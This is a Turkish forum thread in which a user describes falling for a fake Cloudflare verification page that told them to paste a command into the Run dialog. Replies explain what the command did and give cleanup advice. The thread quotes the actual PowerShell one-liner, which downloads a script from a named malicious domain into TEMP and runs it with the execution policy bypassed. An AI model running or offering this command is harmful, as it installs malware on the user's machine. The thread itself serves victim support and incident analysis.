@ardayms, bir uzantinin boyle bir sey yapmis olabilmesi elbette mumkun fakat GoFullPage malware oldugu kanitlanmis bir uzanti oldugu icin degil, daha farkli sebeplerden dolayi Uzanti Magazasindan kaldirildi.

 
Bir siteye girmek için tarayıcı çubuğuna sitenin adresini yazdım fakat 1-2 harf yanlış harf yazımından kaynaklı olduğunu düşündüğüm şekilde farklı bir siteye yönlendirmiş o esnada bunun farkına varmadım, karşıma Cloudflare doğrulaması çıktı. Ekranda yazan talimatlar şu şekildeydi: "Windows + R -> CTRL + V -> Enter". İlk defa böyle bir doğrulama görmüştüm ama hiç şüphelenmedim. Yaptım. Daha sonra birşeylerin yanlış gittiğini farkettim, bilgisayarda ufak takılmalar ve açılıp kapanan CMD ekranları.

Çalıştırdığım komut şuydu: powershell.exe -NoProfile -Command "Invoke-WebRequest -Uri 'https://animecelestialblaze.cfd/dl/gg.pro' -OutFile (Join-Path $env:TEMP 'lo.ps1'); " powershell -ExecutionPolicy Bypass -File "%TEMP%\lo.ps1"

Ekstra olarak "C:\Program Files\MSBuild\ielowutil.exe" konumunda "ielowutil.exe" adında bir uygulama vardı. Sildiğim için dosyayı burayı atamadım ama VT sonucu aşağıda:

VirusTotal

USB ile format atmayı düşündüm ama şu an mevcut olarak 8 GB bir USB'm bulunmuyor. O yüzden Windows'un kendi sıfırlama ayarından, bulut indirme ile format atacağım. Bu konuyu açmamın sebebi bu virüsün büyük çaplı bir virüs mü yoksa basit bir virüs mü olup olmadığını öğrenmek.

Not: Görev zamanlayıcısında da bu vardı (devre dışı bıraktım):

Eki Görüntüle 278447

Eki Görüntüle 278448

Not: Çoğu önemli platformlarda 2 aşamalı doğrulama ayarım açık.
Girdigin komut bir siteden dosyayi indirip security policy'i bypass ederek çalıştırıyor ama calistirmasan once dosyayı TEMP e yüklüyor buda AV'lerden kacinmak amaciyla yuksek ihtimalle sonrasinda dosyayi security policy'i bypass ederek calistiriyor, zaten buradan bile zararlı oldugunu anliyoruz, bence cok büyük capli bir zararli değil zira bu kadar büyük capli bir zararliyi boyle bir phising yontemi ile yaymazlar diye düşünüyorum fakat buyuk capli da olabilir basi anime ile baslayan bir uzantidan indiriyor dosyayi o site hakkında yazilanlara bakılabilir, benzer durumu yasayan insanlarin yorumlarina bakilabilir vs. Su anda virüsü silmek için Windows uzerinden formatlamayin, bu Windows'u silmiyor sadece uygulamalari dosyalari vs. siliyor altyapi ayni yani bunu yaptiginiz takdirde zararlinin silinmemesi cok olasi. Attiginiz dosyalari tespit eden bilinen AV'ler Kaspersky, BitDefender, Windows Defender bu 3 uygulama ile de Tam Tarama yapin, (Windows Defender'da Offline Tarama yapabilirsiniz ekstradan) Kaspersky'i kuracağınız zaman BitDefender'i kaldirin, BitDefender'i indireceğiniz zamanda Kaspersky'i (cakisma yasamasinlar diye diyorum) once halihazirda bulunan Windows Defender'dan yapın sonradan bu 2 AV'yi de deneyin, eger sorun hallolmaz iste BitDefender ile ayni tabani kullansa da Emsisoft Emergency Kit ile de Tam Tarama gerçekleştirebilirsiniz, eger bunlar bulamasa bile kesinlikle Kaspersky'i (onceligimdir) acik tutun, Kaspersky kullanmam diyorsaniz BitDefender da olabilir amac burada zararliyi davranisindan yakalamasi, ayrica Kaspersky Rescue Disk kullanarak Windows ortami disinda cok daha kapsamli bir tarama da yapabilirsiniz. Şüpheniz devam ediyorsa temiz Windows kurulumu cok daha dogru olacaktir.(USB ile)